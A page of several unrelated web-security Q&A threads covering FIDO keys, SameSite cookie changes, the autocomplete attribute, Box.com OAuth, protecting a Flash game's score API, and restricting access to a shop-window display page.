Since FIDO keys have no displays, you can only use them to authenticate yourself, not to authorize some action (you don't know what action you'd be authorizing).
Or, if you want to authorize something, you need to trust your browser that it is displaying the same thing as it will authorize as soon as you press the button on the FIDO key - but then I wonder why you need a hardware key at all, and don't just fully trust your browser with your keys.
So I somehow fail to see the usefulness of FIDO keys. Can someone enlighten me, please?
Even for some simple example, as logging in to my email account - shouldn't that be something better than just authentication? As soon as I've logged in, an attacker that controls my browser (browser is man-in-the-middle) can stay logged in forever, add a forwarding rule to intercept all my emails, and so on.
All this because the FIDO keys would become inconveniently large if they had to include a display? Then why not just add a headphone jack, and at least tell me via text-to-speech what I'm authorizing?
Related
Beginning with Chrome 80, third party cookies will be blocked unless they have SameSite=None and Secure as attributes. With None as a new value for that attribute. https://blog.chromium.org/2019/10/developers-get-ready-for-new.html
The above blog post states that Firefox and Edge plan on implementing these changes at an undetermined date. And there are is a list of incompatible browsers listed here https://www.chromium.org/updates/same-site/incompatible-clients.
What would be the best practice for handling this situation for cross-browser compatibility?
An initial thought is to use local storage instead of a cookie but there is a concern that a similar change could happen with local storage in the future.
You hit on the good point that as browsers move towards stronger methods of preserving user privacy this changes how sites need to consider handling data. There's definitely a tension between the composable / embeddable nature of the web and the privacy / security concerns of that mixed content. I think this is currently coming to the foreground in the conflict between locking down fingerprinting vectors to prevent user tracking that are often the same signals used by sites to detect fraud. The age old problem that if you have perfect privacy for "good" reasons, that means all the people doing "bad" things (like cycling through a batch of stolen credit cards) also have perfect privacy.
Anyway, outside the ethical dilemmas of all of this I would suggest finding ways to encourage users to have an intentional, first-party relationship with your site / service when you need to track some kind of state related to them. It feels like a generally safe assumption to code as if all storage will be partitioned in the long run and that any form of tracking should be via informed consent. If that's not the direction things go, then I still think you will have created a better experience.
In the short term, there are some options at https://web.dev/samesite-cookie-recipes:
Use two sets of cookies, one with current format headers and one without to catch all browsers.
Sniff the useragent to return appropriate headers to the browser.
You can also maintain a first-party cookie, e.g. SameSite=Lax or SameSite=Strict that you use to refresh the cross-site cookies when the user visits your site in a top-level context. For example, if you provide an embeddable widget that gives personalised content, in the event there are no cookies you can display a message in the widget that links the user to the original site to sign in. That way you're explicitly communicating the value to your user of allowing them to be identified across this site boundary.
For a longer-term view, you can look at proposals like HTTP State Tokens which outlines a single, client-controlled token with an explicit cross-site opt-in. There's also the isLoggedIn proposal which is concerned with providing a way of indicating to the browser that a specific token is used to track the user's session.
I know what autocomplete attribute is and how to use it, but I don't get the point of it!
I mean, why should I set autocomplete='off' as a developer?
Is there any security benefits in there? or something?
Yes, it's a security feature. Imagine this scenario:
Your website fell victim to a XSS attack (e.g. somebody was able to implant a piece of javascript in your page without your knowledge)
Your website also has username/password fields, and when a user enters the page, the malicious script immediately takes the values and sends them off to the attacker's server.
Granted, this is not strictly mitigated by disabling auto-complete, but at least it prevents userdata from being stolen just by somebody with saved data loading the page. It requires them to at least type in their credentials.
Also there is the rather obvious component of somebody gaining physical access to your machine and then being able to auto-complete their way into your accounts.
Does anyone know why Box.com make it so hard to generate an authorization code programmatically? I wrote some code to do this through screen-scraping, and then recently this broke because (as far as I can tell) one HTTP request parameter changed from [root_readwrite] to root_readwrite. I was able to fix it reasonably quickly (thank you Fiddler), but why make developers go to this trouble?
Judging by the number of questions on this topic, many developers need to do this, presumably for good reason, and I don't think it can be prevented, so why not just embrace it?
Thanks for listening, Martin
The issue with doing OAuth programmatically is that it would effectively defeat the point of OAuth. Users are supposed to be presented with the Box login page so that they never have to give their username and password directly to your app. This allows users to see what permissions your app has over their account (the scope) and also allows them to revoke your app at any time.
Doing login programmatically means that at some point your app knows the user's password. This requires that the user trusts you to not do anything malicious, which usually isn't feasible unless you're a well-trusted name. The user also has to trust that you handle their credentials correctly and won't use them in an insecure way.
Box wants to encourage developers to do authentication the correct and secure way, and therefore isn't likely to support doing OAuth programmatically. You should really try to perform login the supported way by going through the Box login page.
Over the years I've become an uber-nerd when it comes to flash game development. Now I'm thinking about looking into using my skills for helping other game-developers out there.
I want to develop an API in AS3 which will allow the developer to do (as a start) the following:
Display a dialogue which lets the user log into their "account" (hosted on my site).
Send a score/value to the website and attribute it to the logged in user.
Unlock an achievement (achievements will be set up by the developer in the web interface - which is where they will also get a key of some type to use with their API.
Display high scores, other players profiles in-game, etc (show basically any stats in-game).
All easy enough to develop straight off the bat. However; where it becomes frustrating is security. I'm not expecting an indestructible solution that I'm fully aware isn't possible, but what would be the most defensive way to approach this?
Here are the issues that I can think up on the spot:
The big one - people stealing the API key via man-in-the-middle attack.
Highscore injection, false achievement unlocks.
Decompiling the SWF and stealing the API key.
Using the API key to create a dummy flash application and send random data like highscores.
Altering the API itself so you don't need to be logged in, etc.
One thought I've had was converting my API to a component so there's no access to the code (unless you decompile). The problem here is it's just not friendly to the developers, though it would allow me to create my own graphics for the UI (rather than coding many, many sprites).
Private/public keys won't work unless there is very good protection against decompiling.
I'm beginning to wonder if this idea is a dead end.
Any advice on securing this (or parts of it) would be great.
Look at this thread first if you haven't done so already: What is the best way to stop people hacking the PHP-based highscore table of a Flash game
Against man-in-the-middle HTTPS seems the only option. It may have its vulnerabilities, but it's way better than any home-made solution. The problem that you'll need actual certificate from authorized center, because ActiveX-based Flash plugin will not trust self-signed certificate.
Should not be possible without decompilation
SecureSWF with reasonably high settings (code execution path obfuscation and encrypted strings) should beat most decompilers. Sure, SWF can be examined with hex editor, but this will require very determined hacker.
Should not be possible without decompilation
API should be on server and any API function would require user context (loaded by HTTPS)
Also add encryption to flash shared objects\cookies. I had successfully altered some savegames using simple hex editor, because they were just objects in AMF format. Encryption will depend on SWF decompilation, but since we are using SecureSWF... Or move savegames on server.
client side is never secure enough, so i'd suggest to take all the logic to the server, reducing client to just UI.
If it's impossible due to network timeouts - send scores/achievements only with the log of pairs "user_action - game_state" and verify it on the server.
I have a page that is just a non interactive display for a shop window.
Obviously, I don't link to it, and I'd also like to avoid people stumbling across it (by Google etc).
It will always be powered by Chrome.
I have thought of...
Checking User Agent for Chrome
Ensuring resolution is 1920 x 1080 (not that useful as it is a client side check)
Banning under robots.txt to keep Google out of it
Do you have any more suggestions?
Should I not really worry about it?
Not that I would EVER recommend what I'm about to suggest - how about filtering by IP address. Since you provider IP is rarely going to change you can use Javascript to kick out or deny requests from IP addresses other than yours. Maybe a clean redirect to http://www.google.com or something silly like that. Although I would still suggest locking it down with a login and password and just have it write a never expiring cookie. That's still not a great idea but a shy bit better than the road your trucking down right now.
You could always limit the connections by IP address (If you know it ahead of time/it's reliable):
Apache's access control
If it is just for a shop window, do you even need access to a web page?
You can host the file locally.
Personally, I wouldn't worry about it, if no-one is linking to it externally it is unlikely to ever be found by search engines.